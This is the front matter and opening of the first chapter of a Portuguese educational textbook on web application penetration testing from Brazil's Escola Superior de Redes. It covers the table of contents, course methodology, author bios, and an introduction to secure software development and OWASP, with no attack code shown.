Teste de Invasão de Aplicações Web PDF

Teste de Invaso
de Aplicaes
Web
Nelson Uto
Teste de Invaso
de Aplicaes
Web
Nelson Uto
Teste de Invaso
de Aplicaes
Web
Nelson Uto
Rio de Janeiro
Escola Superior de Redes
2013
Copyright 2013 Rede Nacional de Ensino e Pesquisa RNP

Rua Lauro Mller, 116 sala 1103
22290-906 Rio de Janeiro, RJ
Diretor Geral
Nelson Simes
Diretor de Servios e Solues
Jos Luiz Ribeiro Filho

Coordenao
Luiz Coelho
Edio
Pedro Sangirardi
Coordenao Acadmica de Segurana e Governana de TI
Edson Kowask
Equipe ESR (em ordem alfabtica)
Celia Maciel, Cristiane Oliveira, Derlina Miranda, Elimria Barbosa, Lanusa Silva,
Lourdes Soncin, Luciana Batista, Luiz Carlos Lobato, Renato Duarte e Sergio de Souza
Capa, projeto visual e diagramao
Tecnodesign
Verso
1.1.0
Este material didtico foi elaborado com fins educacionais. Solicitamos que qualquer erro encontrado ou dvida com relao ao material ou seu uso seja enviado para a equipe de elaborao de
contedo da Escola Superior de Redes, no e-mail info@esr.rnp.br. A Rede Nacional de Ensino e
Pesquisa e os autores no assumem qualquer responsabilidade por eventuais danos ou perdas, a
pessoas ou bens, originados do uso deste material.
As marcas registradas mencionadas neste material pertencem aos respectivos titulares.
Distribuio
Rua Lauro Mller, 116 sala 1103

22290-906 Rio de Janeiro, RJ
http://esr.rnp.br
info@esr.rnp.br
Dados Internacionais de Catalogao na Publicao (CIP)

U91s
UTO, Nelson.
Teste de invaso de aplicaes web / Nelson Uto. Rio de Janeiro: RNP/ESR, 2013.
510 p. : il. ; 27,5 cm
ISBN 978-85-63630-17-9
1. Computadores Medidas de segurana. 2. Hackers. 3. Software Manuteno.
Testes. 4. Crime por computador Preveno. I. Ttulo.
CDD 005.8
Sumrio
1. Segurana em aplicaes web
Introduo1
Exerccio de nivelamento 1 Desenvolvimento de software3
Ciclo de desenvolvimento de software seguro3
Exerccio de fixao 1 Atividades de segurana5
OWASP5
Arquiteturas e tecnologias de aplicaes web6
Exerccio de nivelamento 2 Requisitos de segurana8
Reviso de criptografia8
Cifras9
Funes de hash criptogrficas11
MACs11
Assinaturas digitais12
Certificados digitais12
Protocolos SSL e TLS13
Exerccio de fixao 2 Segurana da informao15
Reviso dos protocolos HTTP e HTTPS16
Requisio16
Resposta17
Mtodos18
Cdigos de estado18
Cabealhos18
Cookies19
Autenticao HTTP19
Exerccio de fixao 3 Protocolo HTTP20
iii
Esquemas de codificao20
Codificao de URL20
Codificao HTML21
Roteiro de Atividades 123
Atividade 1 Arquiteturas e tecnologias de aplicaes web23
Atividade 2 Mecanismos criptogrficos23
Bibliografia 134
2. Reconhecimento e mapeamento
Introduo 37
Exerccio de nivelamento 1 Teste de invaso38
Metodologia de teste de invaso39
Exerccio de fixao 1 Etapas de um teste de invaso42
Ferramentas bsicas42
Navegadores web43
Proxies de interceptao44
Web spiders46
Fuzzers47
Varredores de portas e servios47
Varredores de vulnerabilidades48
Outras ferramentas49
Exerccio de fixao 2 Tipos de ferramentas50
Reconhecimento51
Levantamento de informaes em fontes pblicas52
Google hacking52
Identificao de sistema operacional, servios e portas55
Identificao do servidor web56
Levantamento dos mtodos suportados pelos servidores web59
Deteco de hosts virtuais59
Descoberta de arquivos e diretrios60
Exerccio de fixao 3 Fase de reconhecimento62
Mapeamento62
Cpia das pginas e recursos da aplicao62
Identificao dos pontos de entrada de informao63
Relacionamento com as informaes de reconhecimento64
Exerccio de nivelamento 2 Validao unilateral64
iv
Descoberta de vulnerabilidades e explorao65

Explorao de controles no lado cliente65
Exerccio de fixao 4 Segurana de controles67
Contramedidas67
Atividade 1 Ferramentas bsicas69
Atividade 2 Reconhecimento74
Atividade 3 Mapeamento79
Atividade 4 Descoberta e explorao de vulnerabilidades82
Bibliografia 285
3. Teste do mecanismo de autenticao

Introduo87
Exerccio de fixao 1 Autenticao de usurio88
Exerccio de nivelamento 1 Autenticao de entidades88
Tecnologias de autenticao empregadas em aplicaes web89
Exerccio de nivelamento 2 Vulnerabilidades 94
Uso de informaes obtidas nas fases de reconhecimento e mapeamento95
Usurio e senha padronizados97
Enumerao de identificadores de usurios98
Mecanismo vulnervel de recuperao de senhas101
Funcionalidade Lembrar usurio103
Transporte inseguro de credenciais de acesso103
Falhas na implementao do mecanismo104
Mecanismo vulnervel de troca de senhas107
Autenticao com mltiplos fatores108
Ataque de fora bruta109
Ataque de dicionrio110
Ataque contra senhas armazenadas114
Inexistncia de poltica de senhas forte117
Negao de servio direcionada a usurios119
Engenharia social119
Exerccio de fixao 2 Vulnerabilidades em mecanismos de autenticao120
Contramedidas120

Atividade 1 Tecnologias de autenticao 123
Atividade 2 Descoberta de vulnerabilidades e explorao123
Bibliografia 3132
4. Teste do gerenciamento de sesses

Introduo133
Exerccio de fixao 1 Identificador de sesso135
Exerccio de nivelamento 1 Gerenciamento de sesses136
Identificadores de sesso previsveis136
Domnio de identificadores com baixa cardinalidade140
Transmisso em claro de identificadores de sesso141
Manipulao de identificador de sesso por meio de scripts142
Atributos de cookies144
Exerccio de fixao 2 Atributos para proteo146
Sequestro de sesso146
Ataque de fixao de sesso147
Encerramento vulnervel de sesso152
Sesses simultneas de um mesmo usurio152
Cross site request forgery153
Exerccio de fixao 3 Cross site request forgery157
Clickjacking157
Contramedidas163
Atividade 1 Introduo ao gerenciamento de sesses 165
Bibliografia 4177
5. Cross-site scripting
Introduo179
Exerccio de nivelamento 1 Cross-site scripting180
Tipos de XSS180
XSS refletido181
XSS armazenado182
vi
XSS baseado em DOM182

Cross channel scripting185
Exerccio de fixao 1 XSS186
Worms baseados em XSS186
Exerccio de fixao 2 Tcnicas de evaso189
Pontos de injeo189
Roteiros de teste191
Obteno de identificador de sesso192
Adulterao de pgina194
Descoberta de histrico de navegao197
Captura de teclas digitadas no navegador web200
Quebra de token anti-CSRF201
Exerccio de fixao 3 Proteo contra CSRF202
Evaso de filtros202
Arcabouos de explorao204
Contramedidas207
Cdigo do Samy Worm207
Cdigo do Yamanner209
Atividade 1 Introduo215
Atividade 2 Tipos de XSS 215
Atividade 3 Worms baseados em XSS218
Bibliografia 5231
6. Injeo de SQL
Introduo233
Exerccio de nivelamento 1 Consulta SQL problemtica235
Exerccio de fixao 1 Injeo de SQL235
Especificidades de alguns SGBDs236
Comandos de manipulao de dados236
Empilhamento de comandos237
Expresso condicional237
Comando de pausa238
Manipulao de caracteres e de cadeias de caracteres238
vii
Operadores bit-a-bit239
Comentrios239
Locais de injeo240
Testes bsicos241
Extrao de dados via UNION244
Identificao do servidor de banco de dados e de outras informaes247
Identificao das colunas da consulta249
Exerccio de fixao 2 Enumerao de tabelas via injeo de SQL250
Escalada de privilgios250
Descoberta e extrao de tabelas256
Manipulao de arquivos262
Funo definida pelo usurio270
Execuo de comandos no sistema operacional278
Varredura de redes280
Partio e balanceamento285
Injeo de SQL s cegas286
Exerccio de fixao 3 Ataque de injeo de SQL295
Injeo de SQL de segunda ordem295
Evaso de filtros296
Contramedidas297
Exerccio de fixao 4 Stored procedures 298
Atividade 1 Especificidades de SGBDs299
Bibliografia 6313
7. Ataques de injeo
Introduo315
Exerccio de nivelamento 1 Ataques de injeo316
Injeo de comandos de sistema operacional316
Injeo em trilhas de auditoria319
Poluio de parmetros HTTP321
Injeo em filtros LDAP324
Injeo em filtros LDAP s cegas328
Injeo de comandos SMTP e de cabealhos de e-mail330
viii
Injeo de XPath335
Injeo de XPath s cegas339
Incluso de arquivos342
Contramedidas343
Exerccio de fixao 2 Medidas contra ataques344
Apndice Gramtica para representao textual de filtros de busca LDAP345
Gramtica da linguagem XPath 1.0347
Atividade 1 Injeo de comandos de sistema operacional 351
Atividade 2 Injeo em trilhas de auditoria352
Atividade 3 Poluio de parmetros HTTP353
Atividade 4 Injeo em filtros LDAP356
Atividade 5 Injeo em filtros LDAP s cegas358
Atividade 6 Injeo de comandos SMTP e de cabealhos de e-mail359
Atividade 7 Injeo de XPath362
Atividade 8 Injeo de XPath s cegas363
Atividade 9 Incluso de arquivos364
Bibliografia 7367
8. Teste do mecanismo de autorizao e da lgica de negcio

Introduo369
Exerccio de nivelamento 1 Vulnerabilidades em aplicaes web371
Acesso direto a recursos371
Acesso direto a pginas371
Uso do cabealho HTTP Referer372
Acesso direto a objetos373
Acesso direto a recursos estticos375
Exerccio de fixao 1 Aplicaes vulnerveis376
Controle de acesso no lado cliente da aplicao376
Autorizao no lado cliente da aplicao376
Manuteno de perfil no lado cliente da aplicao377
Proteo de referncias a objetos378
Percurso de caminho379
Redirecionamento no validado383
ix
Condies de corrida386
Exerccio de fixao 2 Condies de corrida387
Vulnerabilidades na lgica de negcio387
Transferncia de valor negativo388
Emprstimo acima do limite388
Exerccio de fixao 3 Ferramentas automatizadas390
Contramedidas390
Atividade 1 Acesso direto a recursos 393
Atividade 2 Controle de acesso no lado cliente da aplicao 397
Atividade 3 Percurso de caminho400
Atividade 4 Redirecionamento no validado401
Atividade 5 Condies de corrida403
Atividade 6 Vulnerabilidades na lgica de negcio404
Bibliografia 8405
9. Mecanismos criptogrficos
Introduo407
Exerccio de nivelamento 1 Acesso aplicao web408
Vulnerabilidades no transporte de informaes408
Verso vulnervel de SSL411
Suporte a sutes criptogrficas fracas412
Problemas com o certificado digital417
Acesso a domnio no verificado417
Uso de protocolos proprietrios418
Exerccio de fixao 1 Tipos de vulnerabilidades419
Contramedidas419
Vulnerabilidades no armazenamento de informaes420
Uso de BASE64421
Exerccio de fixao 2 BASE64422
Identificao e quebra de cifras clssicas422
Exerccio de nivelamento 2 Chave criptogrfica443
Recuperao de chaves embutidas em cdigo443
Gerao de chaves com baixa entropia444
Emprego de modo de operao inadequado445
x
Exerccio de fixao 3 ECB449

Uso incorreto de algoritmos criptogrficos449
Mistura de algoritmos com nveis de segurana diferentes451
Exerccio de fixao 4 Ataque a algoritmos452
Uso de algoritmos criptogrficos com fraquezas conhecidas452
Proteo de senhas de usurios453
Proteo de dados de cartes de pagamento454
Contramedidas455
Atividade 1 Vulnerabilidades no transporte de informaes457
Atividade 2 Vulnerabilidades no armazenamento de informaes459
Bibliografia 9467
10. Escrita de relatrios e exerccio completo

Introduo469
Common Vulnerability Scoring System470
Base470
Exerccio de fixao 2 Perigo de vulnerabilidades474
Tipos de relatrios474
Relatrio detalhado474
Relatrio executivo477
Exerccio de fixao 3 Resultado de teste de invaso477
Apndice477
Tabela de escore de base de acordo com o CVSS477
Exemplo de relatrio detalhado479
Exemplo de sumrio executivo485
Atividade 1 Teste da aplicao Vicnum 487
Atividade 2 Capture a bandeira 487
Bibliografia 10489
xi
xii

A Escola Superior de Redes (ESR) a unidade da Rede Nacional de Ensino e Pesquisa
(RNP) responsvel pela disseminao do conhecimento em Tecnologias da Informao e
Comunicao (TIC).
A ESR nasce com a proposta de ser a formadora e disseminadora de competncias em
TIC para o corpo tcnico-administrativo das universidades federais, escolas tcnicas e
unidades federais de pesquisa. Sua misso fundamental realizar a capacitao tcnica
do corpo funcional das organizaes usurias da RNP, para o exerccio de competncias
aplicveis ao uso eficaz e eficiente das TIC.
A ESR oferece dezenas de cursos distribudos nas reas temticas: Administrao e Projeto de Redes, Administrao de Sistemas, Segurana, Mdias de Suporte Colaborao
Digital e Governana de TI.
A ESR tambm participa de diversos projetos de interesse pblico, como a elaborao
e execuo de planos de capacitao para formao de multiplicadores para projetos
educacionais como: formao no uso da conferncia web para a Universidade Aberta do
Brasil (UAB), formao do suporte tcnico de laboratrios do Proinfo e criao de um conjunto de cartilhas sobre redes sem fio para o programa Um Computador por Aluno (UCA).
A metodologia da ESR
A filosofia pedaggica e a metodologia que orientam os cursos da ESR so baseadas na
aprendizagem como construo do conhecimento por meio da resoluo de problemas tpicos da realidade do profissional em formao. Os resultados obtidos nos cursos de natureza
terico-prtica so otimizados, pois o instrutor, auxiliado pelo material didtico, atua no
apenas como expositor de conceitos e informaes, mas principalmente como orientador do
aluno na execuo de atividades contextualizadas nas situaes do cotidiano profissional.
A aprendizagem entendida como a resposta do aluno ao desafio de situaes-problema
semelhantes s encontradas na prtica profissional, que so superadas por meio de anlise,
sntese, julgamento, pensamento crtico e construo de hipteses para a resoluo do problema, em abordagem orientada ao desenvolvimento de competncias.
Dessa forma, o instrutor tem participao ativa e dialgica como orientador do aluno para as
atividades em laboratrio. At mesmo a apresentao da teoria no incio da sesso de aprendizagem no considerada uma simples exposio de conceitos e informaes. O instrutor
busca incentivar a participao dos alunos continuamente.
xiii
As sesses de aprendizagem onde se do a apresentao dos contedos e a realizao das

atividades prticas tm formato presencial e essencialmente prtico, utilizando tcnicas
de estudo dirigido individual, trabalho em equipe e prticas orientadas para o contexto de
atuao do futuro especialista que se pretende formar.
As sesses de aprendizagem desenvolvem-se em trs etapas, com predominncia de
tempo para as atividades prticas, conforme descrio a seguir:
Primeira etapa: apresentao da teoria e esclarecimento de dvidas (de 60 a 90 minutos).
O instrutor apresenta, de maneira sinttica, os conceitos tericos correspondentes ao tema
da sesso de aprendizagem, com auxlio de slides em formato PowerPoint. O instrutor
levanta questes sobre o contedo dos slides em vez de apenas apresent-los, convidando
a turma reflexo e participao. Isso evita que as apresentaes sejam montonas e que o
aluno se coloque em posio de passividade, o que reduziria a aprendizagem.
Segunda etapa: atividades prticas de aprendizagem (de 120 a 150 minutos).
Esta etapa a essncia dos cursos da ESR. A maioria das atividades dos cursos assncrona e
realizada em duplas de alunos, que acompanham o ritmo do roteiro de atividades proposto no
livro de apoio. Instrutor e monitor circulam entre as duplas para solucionar dvidas e oferecer
explicaes complementares.
Terceira etapa: discusso das atividades realizadas (30 minutos).
O instrutor comenta cada atividade, apresentando uma das solues possveis para
resolv-la, devendo ater-se quelas que geram maior dificuldade e polmica. Os alunos so
convidados a comentar as solues encontradas e o instrutor retoma tpicos que tenham
gerado dvidas, estimulando a participao dos alunos. O instrutor sempre estimula os
alunos a encontrarem solues alternativas s sugeridas por ele e pelos colegas e, caso
existam, a coment-las.
Sobre o livro
O livro apresenta uma metodologia de verificao da segurana por meio da simulao de
ataques reais, explorando as vulnerabilidades de um ambiente, plataforma ou sistema, os
quais so reconhecidamente os principais meios explorados para roubo de informaes
confidenciais e invaso de redes corporativas.
Para ser um profissional de pentest, preciso muito mais do que utilizar ferramentas
automatizadas: so necessrios conhecimentos diferenciados e tcnicas avanadas que
permitam a compreenso ampla de cenrios de vulnerabilidades.
Este livro apoia o curso de formao destes novos profissionais atravs das melhores prticas para testes de invaso, contendo atividades de simulao de ataques em ambiente de
teste virtualizado. Ao final do curso, o aluno estar apto a avaliar a eficincia da segurana
de sua organizao, e a propor o modelo de maturidade em segurana de software mais
adequado sua necessidade.
A quem se destina
Curso voltado para tcnicos, analistas e administradores de redes que desejam obter o
conhecimento sobre tcnicas, padres internacionais e ferramental para realizao de testes de invaso em aplicaes web. Tambm indicado para tcnicos e gestores responsveis
pelo desenvolvimento e suporte de sistemas, e para profissionais de computao interessados em adquirir conhecimento diferencial na rea de segurana ciberntica.
xiv
Convenes utilizadas neste livro

As seguintes convenes tipogrficas so usadas neste livro:
Itlico
Indica nomes de arquivos e referncias bibliogrficas relacionadas ao longo do texto.
Largura constante
Indica comandos e suas opes, variveis e atributos, contedo de arquivos e resultado da
sada de comandos.
Contedo de slide
Indica o contedo dos slides referentes ao curso apresentados em sala de aula.
Smbolo
Indica referncia complementar disponvel em site ou pgina na internet.
Smbolo
Indica um documento como referncia complementar.
Smbolo
Indica um vdeo como referncia complementar.
Smbolo
Indica um arquivo de adio como referncia complementar.
Smbolo
Indica um aviso ou precauo a ser considerada.
Smbolo
Indica questionamentos que estimulam a reflexo ou apresenta contedo de apoio ao
entendimento do tema em questo.
Smbolo
Indica notas e informaes complementares como dicas, sugestes de leitura adicional ou
mesmo uma observao.
Permisses de uso
Todos os direitos reservados RNP.
Agradecemos sempre citar esta fonte quando incluir parte deste livro em outra obra.
Exemplo de citao: UTO, Nelson. Teste de Invaso de Aplicaes Web. Rio de Janeiro: Escola
Superior de Redes, RNP, 2013.
Comentrios e perguntas
Para enviar comentrios e perguntas sobre esta publicao:
Escola Superior de Redes RNP
Endereo: Av. Lauro Mller 116 sala 1103 Botafogo
Rio de Janeiro RJ 22290-906
E-mail: info@esr.rnp.br
xv
Sobre os autores
Nelson Uto bacharel e mestre em Cincia da Computao pela Universidade Estadual de
Campinas Unicamp. Durante o mestrado, realizado sob superviso do Prof. Dr. Ricardo
Dahab, abordou a segurana de sistemas de agentes mveis e implementou, para a plataforma Aglets da IBM, alguns dos mecanismos estudados. Neste mesmo perodo, avaliou
artigos para congressos nacionais em Segurana da Informao e para o peridico Journal
of Universal Computer Science. Possui, tambm, vrios artigos publicados em congressos
nacionais e internacionais, discorrendo sobre diversos temas de Segurana da Informao. Trabalha na rea de TI h 15 anos, sendo 9 deles em Segurana da Informao e, em
especial, em criptografia aplicada e segurana de software. Nesta rea, dentre os projetos
de pesquisa e de consultoria dos quais participou, pode-se citar: criptoanlise de arquivos
gerados por malwares; testes de invaso de aplicaes web e cliente-servidor; anlise de
vulnerabilidades em implementaes criptogrficas; aplicao da tcnica K-Means para a
gerao semiautomtica de regras de correlao de eventos de segurana; gerenciamento
de chaves criptogrficas; anlise de bibliotecas com suporte Criptografia de Curvas Elpticas para as plataformas XScale e x86; verificao da correo dos algoritmos criptogrficos
implementados por uma biblioteca comercial; anlise de riscos de sistemas com base na
norma ISO/IEC 18028; avaliao de vulnerabilidades de sistemas operacionais e SGBDs;
elaborao de polticas de segurana e auditoria PCI. Tem experincia no desenvolvimento
de softwares em linguagens C, C++, Java e Assembly x86. Como projetos mais interessantes nesse domnio esto a criao de um driver ODBC-JDBC e um tradutor 4GL-Java, para a
gerao automtica de cdigo semanticamente equivalente em Java a partir de programas
em 4GL. Por fim, professor de graduao e ps-graduao, ministrando disciplinas nas
reas de Segurana e Tecnologia da Informao, alm de coordenar h trs anos um curso
de ps-graduao em segurana.
Edson Kowask Bezerra profissional da rea de segurana da informao e governana
h mais de quinze anos, atuando como auditor lder, pesquisador, gerente de projetos e
gerente tcnico, em inmeros projetos de gesto de riscos, gesto de segurana da informao, continuidade de negcios, PCI, auditoria e recuperao de desastres em empresas
de grande porte do setor de telecomunicaes, financeiro, energia, indstria e governo.
Com vasta experincia nos temas de segurana, tem atuado tambm como palestrante nos
principais eventos do Brasil e ainda como instrutor de treinamentos focados em segurana
e governana. professor e coordenador de cursos de ps-graduao na rea de segurana
da informao, gesto integrada, de inovao e tecnologias web. Hoje atua como Coordenador Acadmico de Segurana e Governana de TI da Escola Superior de Redes.
xvi
Dedico este trabalho:

Marcia Hoffmann, pela companhia, amor e pacincia;
minha famlia, pela educao que me foi dada;
Aos verdadeiros amigos, que sempre me estenderam a mo quando precisei;
A todos os autores que, ao compartilharem conhecimento, auxiliaram a criao deste livro.
Nelson Uto
xvii
xviii
1
objetivos
Segurana em aplicaes web

Introduzir conceitos sobre desenvolvimento de software seguro e rever diversos
tpicos relacionados criptografia e aos protocolos HTTP e HTTPS.
conceitos
Ciclo de desenvolvimento de software seguro, arquiteturas e tecnologias de

aplicaes web, criptografia, pro-tocolos HTTP e HTTPS.
Introduo
Vulnerabilidades em softwares tm sido amplamente utilizadas por atacantes para
roubo de informaes confidenciais e invases de redes corporativas.

Prover a segurana de um software, porm, no um objetivo fcil de ser alcanado,
dada a complexidade dos sistemas nos dias de hoje.
Facilmente, eles atingem dezenas de milhares de linhas de cdigo, que contm, invariavelmente, quantidade de defeitos significativa. Alguns destes tm impacto direto em segurana,
podendo acarretar desde a indisponibilidade do sistema at o controle total do computador
por um atacante. Para piorar ainda mais esse cenrio, considere que, normalmente, um
ciclo de desenvolvimento de software seguro no adotado, o que resulta, no mnimo, em
especificaes inseguras e configurao vulnervel das plataformas subjacentes.
Dicionrio pblico
contendo descries
de vulnerabilidades de
segurana descobertas.
SQL
Structured Query
Language uma
linguagem baseada
na lgebra relacional,
que utilizada para
manipular informaes
contidas em bancos de
dados relacionais.
Para se ter uma ideia mais clara do mundo real, no perodo de 2001 a 2006 o nmero de
vulnerabilidades em sistemas reportado ao Common Vulnerabilities and Exposures simplesmente triplicou. Alm disso, houve mudana nos tipos de fraquezas mais comumente
encontradas, como possvel observar na Figura 1. O extravasamento de buffer, campeo
da lista por muitos anos consecutivos, perdeu o lugar, a partir de 2005, para vulnerabilidades de injeo de cdigo, como o cross-site scripting e injeo de SQL, por exemplo. Esses
tipos de fraquezas afetam, basicamente, sistemas web e indicam duas coisas:
1 A recente popularizao das interfaces web para comrcio eletrnico, internet banking
e configurao de elementos de rede.
1 Os problemas de segurana desse domnio no esto sendo adequadamente considerados durante o processo de desenvolvimento, tanto por ignorncia como pela presso
causada por cronogramas de entrega apertados.
Extravasamento de buffer uma vulnerabilidade comum em programas escritos em lin-
Captulo 1 - Segurana em aplicaes web
Common
Vulnerabilites
and Exposures
guagem de baixo nvel e ocorre quando possvel escrever em uma regio de memria alm
dos limites alocados para uma dada estrutura, como um vetor, por exemplo. O resultado da
explorao do problema pode ser desde um trmino abrupto do programa at o controle
% do total de vulnerabilidades reportado ao CVE
total do sistema operacional.

25
20
15
Cross-site scripting
Extravasamento de buer
10
Injeo SQL
Navegao de diretrio
PHP Include
Vazamento de informao
Negao de servio
0
2001
2002
2003
2004
2005
2006
Estouro de inteiro
Ano
possvel considerar, de modo geral, que nem um software est livre de vulnerabilidades de
segurana, principalmente quando a complexidade deles for grande.
A melhor estratgia a ser adotada, ento, consiste em encontrar essas vulnerabilidades
o mais cedo possvel e corrigi-las imediatamente, antes que sejam exploradas por usurios maliciosos. Veja algumas maneiras de realizar essa tarefa:
1 Anlise de documentos de requisitos, projeto e arquitetura: permite detectar

problemas no projeto e arquitetura da aplicao.
1 Anlise de cdigo-fonte: a melhor ferramenta possvel para deteco de vulnerabilidades em software, mas pode ser proibitiva para sistemas muito grandes, devido ao
tempo que a tarefa consome. Alguns tipos de defeitos de segurana, porm, somente
podem ser encontrados dessa maneira.
1 Teste de invaso: esse o tema deste curso e consiste na execuo de ataques visando
violar os requisitos de segurana explcitos e implcitos de uma aplicao. O processo
todo realizado ciclicamente e, a cada interao, a base de conhecimento sobre o
sistema aumenta e novas vulnerabilidades podem ser descobertas e exploradas.
1 Ferramentas automatizadas: so timas para auxiliar um analista de segurana na

execuo de processos repetitivos e deteco de alguns tipos de vulnerabilidades.
Teste de Invaso de Aplicaes Web
Porm, no so capazes de encontrar inmeras classes de problemas, que necessitam de

um conhecimento do domnio da aplicao e da semntica dos parmetros utilizados.
Vale ressaltar que vulnerabilidades em software, frequentemente, so as responsveis
pelo comprometimento do bem mais importante da empresa, que a informao. Assim,
esforos devem ser direcionados para mitigar os riscos decorrentes da criao e utilizao
de softwares inseguros nos processos de negcio das empresas. Tal objetivo s alcanado
plenamente por meio da implantao de um ciclo de desenvolvimento de software seguro.
No contexto apresentado, o objetivo deste captulo revisar os principais conceitos necessrios
realizao de um teste de invaso de aplicaes web. Desse modo, o restante deste captulo
inclui noes de um ciclo de desenvolvimento de software seguro, arquiteturas e tecnologias de
aplicaes web, conceitos de criptografia e reviso dos protocolos HTTP e HTTPS.
2
Figura 1.1
Progresso da ocorrncia das principais
vulnerabilidades
reportadas ao CVE.
Exerccio de nivelamento 1 e
Desenvolvimento de software
Sua organizao adota um ciclo de desenvolvimento de software seguro?
Ciclo de desenvolvimento de software seguro

Um software seguro aquele que satisfaz os requisitos implcitos e explcitos de segu-
rana em condies normais de operao e em situaes decorrentes de atividade maliciosa de usurios. Para isso, deve resultar de um ciclo de desenvolvimento que considere
aspectos de segurana em todas as suas fases (McGraw, 2006; Kissel et al., 2008):
1 Na etapa de especificao, requisitos explcitos de segurana devem ser enumerados

e requisitos funcionais devem ser avaliados para verificar se no introduzem uma
vulnerabilidade no sistema.
1 Atividades comumente realizadas na fase seguinte, a de projeto, incluem o mapeamento do modelo de dados para estruturas lgicas e fsicas, a definio de padres
de interface a serem utilizados, a escolha de elementos de hardware e software que
faro parte da soluo e o desenho da topologia a ser adotada.
1 Para minimizar vulnerabilidades de codificao, os desenvolvedores devem ser treinados em tcnicas gerais de programao segura e nas especificidades das linguagens com as quais trabalham.
1 Testes de segurana so fundamentalmente diferentes de testes funcionais e, por

isso, devem ser feitos por profissionais especializados.
1 Por fim, e no menos importantes, encontram-se a implantao do sistema no

ambiente de produo e a manuteno.
Todavia, muitos desenvolvedores comeam a se preocupar com segurana somente quando
o software est quase finalizado, pois acreditam, erroneamente, ser possvel trabalhar
dessa maneira. Tal abordagem s contribui para maior custo, pois as correes de vulnerabilidades tornam-se mais caras medida que se avana pelas fases de desenvolvimento,
Figura 1.2
Custo relativo de
correo de software
de acordo com a
fase do ciclo de
desenvolvimento.
Fase
Custo relativo para correo
Definio
Projeto de alto nvel
Projeto detalhado
Codificao
10
Teste de unidade
15
Teste de integrao
22
Teste de sistema
50
Ps-entrega
100
conforme ilustrado na Figura 1.2, extrada de Wysopal et al. (2006).
Cada fase de um ciclo de desenvolvimento de software seguro, portanto, tem sua parcela de
contribuio para a qualidade do resultado final e no pode ser omitida durante o processo.
Na etapa de especificao, requisitos explcitos de segurana devem ser enumerados e
requisitos funcionais devem ser avaliados para verificar se no introduzem uma vulnerabilidade no sistema. Um caso ilustrativo o do suposto Microsoft Bob, um programa criado
para auxiliar o usurio do sistema operacional sempre que se encontrasse em dificuldades
na realizao de alguma tarefa. Seguindo essa filosofia, sempre que um usurio errasse
a senha trs vezes consecutivas, ele aparecia e perguntava se desejava troc-la, para
conectar-se ao ambiente (McGraw, 2006). Nessa situao, no importa quo bem implementada esteja a funcionalidade: o sistema continuar intrinsecamente inseguro.
Atividades comumente realizadas na fase seguinte, a de projeto, incluem o mapeamento
do modelo de dados para estruturas lgicas e fsicas, a definio de padres de interface a
serem utilizados, a escolha de elementos de hardware e software que faro parte da soluo
e o desenho da topologia a ser adotada. Nesse contexto, um problema muito comum de
segurana que surge o posicionamento incorreto do banco de dados na topologia de rede.
Para ilustrar esse ponto, considere o levantamento realizado por Litchfield, no final de 2005,
em que foram detectados cerca de 350 mil bancos de dados, contendo dados de produo
diretamente na DeMilitarized Zone DMZ externa das empresas (Litchfield, 2007). Esse
DMZ
exemplo evidencia pelo menos um dos inmeros aspectos de segurana que devem ser con-
Segmento de rede que

separa redes protegidas
de no protegidas,
como a internet,
e utilizado para
prover servios para
o ambiente externo.
Assim, servidores web
e de correio eletrnico
normalmente so
instalados na DMZ. O
termo tem origem na
regio de terra neutra
que separa as Coreias
do Norte e do Sul.
siderados no projeto do software, ao lado de decises sobre protocolos seguros de comunicao e seleo de algoritmos criptogrficos.
O prximo passo consiste na implementao do software propriamente dito, em uma ou
mais linguagens de programao, dependendo de cada caso. Para minimizar vulnerabilidades de codificao, os desenvolvedores devem ser treinados em tcnicas gerais de
programao segura e nas especificidades das linguagens com as quais trabalham. Por
exemplo, extravasamento de buffer um problema comum em programas feitos em C e
C++ (Seacord, 2005), mas no ocorre na linguagem Java, pois a mquina virtual verifica se
um acesso a um vetor est dentro dos limites possveis. Ferramentas automatizadas para
reviso de cdigo podem ser de grande ajuda na identificao de padres reconhecidamente inseguros de programao, como o uso das funes strcpy() e strcmp() em C/C++.
Testes de segurana so fundamentalmente diferentes de testes funcionais e, por isso,
devem ser feitos por profissionais especializados. Os ltimos so descritos em casos de
testes, os quais definem um roteiro dos passos a serem seguidos e o resultado esperado de
um comportamento no defeituoso. Obviamente, nenhum sistema criado com caminhos
documentados de como os requisitos de segurana podem ser subjugados, e a reside a
diferena. Portanto, ao procurar vulnerabilidades em um software, o testador segue uma
linha de raciocnio diferente da tradicional, ao colocar-se no lugar do usurio malicioso, que
tenta encontrar fluxos no previstos que possam comprometer a aplicao. A automao

de algumas tarefas nesse processo pode implicar ganho de produtividade, mas o papel do
especialista continua sendo fundamental.
Por fim, e no menos importantes, encontram-se a implantao do sistema no ambiente
de produo e a manuteno. Antes da liberao para o uso, fundamental que todos os
servidores utilizados pela aplicao sejam robustecidos, com eliminao de servios e contas
desnecessrios e configurao dos parmetros de segurana de acordo com as melhores
prticas estabelecidas para as plataformas. Correes de segurana devem ser aplicadas
periodicamente no ambiente, principalmente, aquelas consideradas crticas. Caso criptossistemas com chave sejam empregados, procedimentos adequados de gerenciamento de chaves
criptogrficas devem ser adotados (Menezes et al., 2001; Barker et al., 2007a,b). E, no caso de
comprometimento do sistema, o problema deve ser identificado e imediatamente corrigido.
Invariavelmente, todo software sempre apresenta uma ou mais falhas de segurana ao
longo de sua existncia. Assim, razovel concluir que utpico construir um sistema
completamente invulnervel. Porm, com um ciclo de desenvolvimento seguro, possvel,
no mnimo, produzir consistentemente sistemas com um nmero reduzido de brechas e que
possuam mecanismos de proteo contra os diversos ataques conhecidos.
Exerccio de fixao 1 e
Atividades de segurana
Que atividades de segurana podem ser includas em cada etapa de um ciclo de desenvolvimento de software seguro?
OWASP
O grupo Open Web Application Security Project uma organizao mundial, sem fins lucrativos, que visa divulgar aspectos de segurana de aplicaes web, para que o risco nesses
ambientes seja devidamente avaliado por pessoas e empresas. Existem, hoje, 130 captulos
locais, espalhados pelos cinco continentes, todos abertos, gratuitamente, para participao
de pessoas interessadas no assunto. A entidade, alm de organizar conferncias internacionais e encontros sobre o tema, mantm diversos projetos, que variam de guias de implementao segura a ferramentas.
Os trabalhos do OWASP relevantes para este curso esto brevemente descritos nos
pargrafos a seguir:
1 Top Ten: uma lista, j na terceira verso, das dez vulnerabilidades de maior risco
presentes em aplicaes web, segundo a experincia prtica de diversos especialistas
membros da organizao. Por essa razo, foi adotado pelos padres PCI DSS (PCI, 2009a)
e PCI PA-DSS (PCI, 2009b) para figurar como os itens mnimos que devem ser considerados na codificao segura de sistemas web.
